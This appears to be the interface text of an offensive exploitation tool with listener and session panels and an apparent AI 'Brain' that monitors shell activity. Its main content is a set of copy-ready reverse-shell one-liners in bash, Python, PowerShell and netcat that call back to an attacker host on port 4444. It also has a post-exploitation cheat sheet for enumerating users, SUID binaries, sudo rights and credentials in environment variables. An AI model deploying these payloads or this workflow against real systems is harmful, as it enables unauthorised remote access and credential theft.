/
Listeners 0 active

No active listeners

Sessions 0 live
No sessions yet
Reverse shells appear here when an exploit calls back to a listener. Scans alone don't produce shells — you need to actually run a payload.
  1. Start a listener above (default port 4444).
  2. Pick a target on /targets or run /oneshot for the full chain.
  3. Generate the payload one-liner on /payloads with your LHOST + LPORT.
  4. Deliver it via exploit on /execute (or any RCE path).

No session selected

Start a listener, then catch a shell to begin

Reverse Shell Payloads LHOST: LHOST
Port 4444
bash bash -i >& /dev/tcp/LHOST/4444 0>&1
python3 python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("LHOST",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('LHOST',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sb = (iex $data 2>&1|Out-String);$sb2 = $sb+'PS '+(pwd).Path+'> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sb2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
nc nc -e /bin/sh LHOST 4444
Brain Teaching
Brain evaluating next action…
Brain Activity

Brain is monitoring for shell activity.

Start a listener and catch a shell to see real-time annotations here.

Quick Reference
whoami && id Who am I + groups
uname -a Kernel version
ip a; ip r Network + routing
cat /etc/passwd | grep bash Shell users
find / -perm -4000 2>/dev/null SUID binaries
sudo -l Sudo permissions
env | grep -i key Env credentials
arp -n Neighbor hosts
ss -tuln Listening services
history Command history